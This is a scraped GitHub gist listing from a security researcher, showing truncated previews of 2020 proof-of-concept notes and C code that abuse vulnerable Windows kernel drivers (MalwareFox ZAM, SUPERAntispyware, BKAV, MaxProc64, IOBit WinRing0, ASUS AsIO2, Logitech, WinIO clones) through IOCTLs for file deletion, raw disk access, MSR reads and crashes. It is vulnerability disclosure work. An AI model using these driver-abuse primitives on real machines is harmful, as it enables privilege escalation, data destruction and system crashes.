Skip to content

Instantly share code, notes, and snippets.

View hfiref0x's full-sized avatar

hfiref0x

3.6k followers · 18 following
View GitHub Profile
@hfiref0x
hfiref0x / zam.md
Created February 26, 2020 06:52
MalwareFox ZAM backdoor IOCTL list

ZAM64.SYS (ZAMGUARD64.SYS) most interesting IOCTLs.

All parameters to the functions supplied from user-mode via DeviceIoControl parameters. Everything from this available for any local user on machine where this driver is running.

0x8000202C

Arbitrary file deletion. Resets file attributes via ZwSetInformationFile and then does ZwDeleteFile.

0x80002030

Wrapper around ZwQuerySystemInformation(SystemProcessInformation).

@hfiref0x
hfiref0x / bkavsp.c
Created February 25, 2020 18:35
BKAVSP Arbitrary File Deletion
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
#if defined (_MSC_VER)
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
@hfiref0x
hfiref0x / desc.txt
Created February 25, 2020 08:07
SUPERAntispyware backdoor
This is saskutil64.sys 1.0.0.1016 driver of SUPERAntispyware 8.0.0.1050 (current), both Free/Pro editions.
The SaskCallDriver function work with fixed size buffer send from user mode.
This buffer is a structure defined as
#pragma pack(push, 1)
typedef struct _CALL_DRV {
WCHAR DeviceName[2048]; //e.g. \Device\Harddisk0\DR0
LARGE_INTEGER StartingOffset;
SIZE_T DataSize;
PVOID DataPtr; //pointer to user mode allocated buffer of DataSize length.
@hfiref0x
hfiref0x / MaxBSOD.c
Created February 24, 2020 06:50
int main()
{
HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\MaxProc64"),
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL);
@hfiref0x
hfiref0x / maxproc64.c
Created February 24, 2020 06:36
__int64 __fastcall DrvDispatch(PDEVICE_OBJECT DeviceObject, _IRP *Irp)
{
_IO_STACK_LOCATION *StackLocation;
_IRP *_Irp;
__int64 Id;
StackLocation = Irp->Tail.Overlay.CurrentStackLocation;
_Irp = Irp;
switch ( StackLocation->Parameters.DeviceIoControl.IoControlCode )
{
@hfiref0x
hfiref0x / 0.c
Created February 22, 2020 07:34
IOBit WinRing0 hack-o-rama
#include <windows.h>
#include "ntos.h"
#include <cstdio>
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
_In_ PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_In_opt_ PVOID OutputBuffer,
@hfiref0x
hfiref0x / asusgio2.c
Created February 19, 2020 14:52
AsIO2
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
_In_ PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_In_opt_ PVOID OutputBuffer,
_In_opt_ ULONG OutputBufferLength)
{
BOOL bResult = FALSE;
IO_STATUS_BLOCK ioStatus;
@hfiref0x
hfiref0x / lg.c
Created February 18, 2020 03:33
Logitech LgCoreTemp.sys Features
#include <windows.h>
#include <cstdio>
#include "ntos.h"
#define LG_DEVICE_TYPE (DWORD)0xC350
#define LG_READVALUE (DWORD)0x800
#define LG_READREFCOUNT (DWORD)0x801
#define LG_READMSR (DWORD)0x821
#define IOCTL_LG_READVALUE \
@hfiref0x
hfiref0x / entech_new.c
Created February 15, 2020 04:09
#include <windows.h>
#include <cstdio>
#include "ntos.h"
#define WINIO_DEVICE_TYPE (DWORD)0x8010
#define WINIO_READMSR (DWORD)0x816
#define IOCTL_WINIO_READMSR \
CTL_CODE(WINIO_DEVICE_TYPE, WINIO_READMSR, METHOD_BUFFERED, FILE_ANY_ACCESS)
@hfiref0x
hfiref0x / GLCKIo2.c
Created February 11, 2020 11:11
#include "ntos.h"
#define GLCKIO_DEVICE_TYPE (DWORD)0x8010 //same as WinIO/MsIo and all clones based on this bugfest code
#define GLCKIO_REGISTER_FUNCID (DWORD)0x818
#define GLCKIO_READMSR (DWORD)0x816
#define IOCTL_GKCKIO_REGISTER \
CTL_CODE(GLCKIO_DEVICE_TYPE, GLCKIO_REGISTER_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS)